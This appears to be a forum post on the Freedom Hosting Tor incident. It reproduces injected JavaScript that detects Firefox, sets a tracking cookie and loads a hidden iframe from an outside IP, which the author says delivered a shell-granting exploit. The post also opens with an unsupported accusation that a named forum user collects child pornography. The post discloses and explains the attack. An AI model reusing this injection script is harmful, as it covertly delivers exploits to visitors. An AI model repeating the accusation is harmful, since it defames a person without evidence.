It doesnt matter really because neither is going to keep Rollo Tomasi out of jail for collecting child pornography, which is how he blows off steam after he gets stomped into wine every time he opens his mouth on the forum.

Anyway, a TOR user cruising an .onion site noticed some strange traffic on his network and discovered that half the sites at least on "freedom hosting" aka .onion were serving this code:

Code:
function createCookie(name,value,minutes) {
        if (minutes) {
                var date = new Date();
                date.setTime(date.getTime()+(minutes*60*1000));
                var expires = "; expires="+date.toGMTString();
        }
        else var expires = "";
        document.cookie = name+"="+value+expires+"; path=/";
}
 
function readCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for(var i=0;i < ca.length;i++) {
        var c = ca[i];
        while (c.charAt(0)==' ') c = c.substring(1,c.length);
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
    }
    return null;
}
 
function isFF() {
    return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
}
 
function updatify() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "inline";
    iframe.frameBorder = "0";
    iframe.scrolling = "no";
    iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66";
    iframe.height = "5";
    iframe.width = "*";
    document.body.appendChild(iframe);
}
 
function freedomhost() {
    if ( ! readCookie("n_serv") ) {
        createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
        updatify();
    }
}
 
function isReady()
{
    if ( document.readyState === "interactive" || document.readyState === "complete" ) {
   
        if ( isFF() ) {
            //window.alert(window.location + "Firefox Detected.")
            freedomhost();
        }
    }
    else
    {
        setTimeout(isReady, 250);
    }
}
setTimeout(isReady, 250);
Basically that checks to see if youre running the most popular TOR bundled version of Firefox on Windows.

Which, inexplicably, no longer disables javascript by default.

If so, this iframe is served:

iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66";

And a javascript exploit is delivered to the TOR browser, affording the remote actor shell access to your computer.

Given the recent success at the FBI with gaining access to TOR pedo rings, it should be obvious whose sitting at ip 65.222.202.53.

So basically if youre running TOR and you view anything on .onion, youre machine gets prawned by FBI.

TORs response is basically "we are TOR, they are Freedom Hosting, this is between yall, we are looking into patching that exploit one of these days if we can.", so it sounds like TOR is basically perfectly ok with Rollo and his pedo ilk getting flushed down the drain.

But Im totally sure silk road is secure.